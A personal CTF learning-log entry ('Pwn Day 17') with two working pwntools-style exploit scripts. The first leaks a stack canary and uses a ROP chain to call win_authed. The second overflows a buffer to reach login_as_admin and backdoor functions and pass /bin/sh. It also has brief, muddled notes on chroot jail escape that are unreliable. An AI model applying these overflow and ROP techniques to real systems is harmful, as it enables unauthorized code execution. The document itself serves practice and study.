Pwn Day 17

My current challenge is bypassing a canary

My canary sits 136 bytes away from my input and my return address is 160

Usually I can do this with a leak by exploiting printf and then doing a rop to the beginning of the function. But it looks like I can also exploit this strstr function in my program

strstr will return a pointer for the string I am searching for

So if I can meet what it is looking for already I can return back to my orginal address. It does all the work for me

#!/usr/bin/python3
from pwn import *
import sys
context.log_level = 'DEBUG'
context(os='linux', arch='amd64')
exe = './chal'
e = context.binary = ELF(exe, checksec=False)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
p = e.debug(gdbscript='''
source /home/nick/global/halfdisp.py
break *challenge+2135
c
'''
)
p.recvuntil(b"Payload size:")
p.sendline(b"20")

p.recvuntil(b"Send your payload (up to 20 bytes)!")
p.send(b"RREPEAT")

p.recvuntil(b"the canary value is now ")
leak_canary = p.recvline()

p.recvuntil(b"the address of win_authed() is ")
leak_win= p.recvline()

rop=ROP(e)
pop_rdi = rop.find_gadget(["pop rdi"])[0]

leak_win = leak_win.strip(b"\n")
leak_win = leak_win.strip(b".")
leak_pop_rdi = int(leak_win, 16)
leak_pop_rdi= leak_pop_rdi+0xb09

leak_win = p64(int(leak_win, 16))
leak_canary = leak_canary.strip(b"\n")
leak_canary = leak_canary.strip(b".")
leak_canary = p64(int(leak_canary, 16))
print("Packed Address (Hex):", leak_canary.hex())

# NEXT
p.recvuntil("Payload size: ")
p.send(b"360")


payload = flat([
    b"\x90"*137,
    leak_canary,
    b"\x90"*8,
    p64(leak_pop_rdi),
p64(0x1337),
    leak_win
])

p.send(payload)
p.interactive()

Time to move on to sandboxing

chroot into a jail then I need to escape from that jail

Chroot changes the reference of / to the absolute location of /tmp/jail

To escape the jail one tradional practice is simply doing

../../../../../../../

This is because / will be not be enough

Overall chroot is a way to breakout of UID

Time to move onto a chal

import interact
import struct

# Pack integer 'n' into a 8-Byte representation
def p64(n):
    return struct.pack('Q', n)

# Unpack 8-Byte-long string 's' into a Python integer
def u64(s):
    return struct.unpack('Q', s)[0]

p = interact.Process()
login_as_admin = p64(0x400bce)
backdoor= p64(0x400b8a)
# p.readuntil("Enter choice:")
p.sendline(b"1")
p.sendline(b"\x90"*148+login_as_admin)
p.sendline("")

p.sendline(b"3")
p.sendline(b"")
p.sendline(b"2")
p.sendline("l0ln0onewillguessth1s")
p.sendline("")

p.sendline(b"0")
p.sendline(b"1")
p.sendline(b"/bin/sh")
p.sendline(b"1")

p.sendline(b"\x90"*148+backdoor)
p.sendline("")
p.sendline(b"4")
p.sendline("")
p.sendline("2")

p.interactive()